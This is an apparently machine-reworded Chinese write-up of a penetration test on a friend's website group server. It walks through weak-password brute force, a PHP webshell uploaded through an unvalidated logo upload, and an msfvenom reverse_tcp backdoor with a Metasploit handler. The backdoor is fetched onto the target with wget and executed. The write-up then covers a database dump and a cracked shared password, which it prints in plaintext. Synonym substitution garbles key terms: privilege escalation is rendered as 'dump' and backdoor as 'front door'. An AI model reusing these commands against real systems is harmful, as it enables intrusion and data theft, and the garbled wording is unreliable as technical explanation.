主页 >   新闻中心   >   易云公告   >
从弱口令到拿下站群服务器
时间 : 2021-04-12 11:01
来源 : 网络整理

声明:本文仅限于技术讨论与分享,严禁适于违法途径。若读者为此做出任何害处网路安全行为后果自傲,与本号及原作者无关。

本文牵涉知识点实战练习:DoraBox之文件上传 (通过DoraBox靶场系列闯关练习,了解文件上传漏洞的基础知识及怎样进行跨过上传蓄意文件。)

一、

前两天我一个同学给我发来一个链接,说他做的站打算上线,问我能不能做下检测,既然是同学,那肯定义不容辞,准备开始弄事情。

二、

1、先打开网站浏览一下,发现直接跳转至了登入页面,如下:

简单了尝试了下弱口令、万能密码跟登陆框xss,发现输入框对键入内容做了严苛的过滤,非法字符一概不准许,果断舍弃。

2、简单扫描了一下敏感目录,发现一个/adminx,果然这些开放注册的站还会给管理员提供一个专门的登陆入口

(忽略这个 1.zip,那是我打包整站时留下的

尝试爆破,弱口令一波带走,进入后台,赶紧把捷报报告给同学,让他“惊喜”一下

3、寻找上传点

进至后台以后寻求上传点,发现系统设置处有更改站点logo的功能,先传个php小马试试水

我当场就惊了,你后台登陆框过滤这么严苛结果你这上传点就这就这??好歹做个本地校准啊,你使burpsuite面子往哪搁?

4、连接shell尝试转储

传了马后来使用蚁剑连结,首先就是查看服务器信息,这里有个小插曲,打开虚拟终端以后无论执行哪些命令,返回结果都是 ret=127

应该是服务器上有哪些安全硬件做了过滤,使用蚁剑自带的插件进行bypass

成功跨过

不过蚁剑的这个跨过连结不太稳定,而且速率也太慢,于是寻思着推行一个meterpreter会话尝试转储。

5、建立meterpreter 会话

在云服务器上使用msfvenom 生成一个正门:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=服务器ip LPORT=监听端口 -f elf > shell.elf

然后在服务器设置一个窃听会话:

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set LHOST 服务器ip

set LPORT 监听端口

run

在服务器上使用python推行一个简略的http服务:

python3 -m http.server

在目标主机使用wget下载正门文件并执行,成功获取meterpreter 会话

6、尝试转储遇阻

由于目标服务器运行的是 CentOS 8.0,内核版本为 Linux 4.18.0,且我获取至的仅为一个低权限的shell,想要实现转储是很难的,在明知肯定失败的状况下我还是尝试了脏牛等所有的我手上能用的转储exp,均宣告失败,也是预料之中的事。

7、柳暗花明又一村

提权无果以后,我开始翻动服务器上的各类文件,然后发觉了不得了的线索,乖乖这是个站群啊

然后我从每位站的配置文件中都得到了它们对应的数据库以及数据库帐号密码,看样子应当是随机生成的,不象是会用作root用户密码的通用密码,如下图:

于是我上传了一个脱裤马,获取至了所有的数据库sql文件,尝试访问所有的数据站群服务器,以寻找一个或许的通用密码,没想到还真使我找到了,在几个采集站跟发卡站的库中,我找到了如下相似的md5值:

md5揭秘后结果为:vip886.A

尝试ssh连结服务器,成功

至此渗透结束。

8、总结

此次渗透没哪些技术浓度站群服务器,但是足以显示出弱口令以及通用密码对于安全的害处有多大,另外上传功能的处理只是很重要的,一丁点防护都没有的上传点我是真头一对不住。

漏洞报告早已还给我同学啦,没想到也有小钱钱拿,开心。

上一篇:IDC数据中心机柜租用怎么收费?机柜租用哪里便宜? 下一篇:云虚拟主机,VPS和云服务器有什么差异和不同?
+86 0517-86871020

拨打
电话

客服
咨询

技术
支持

渠道
支持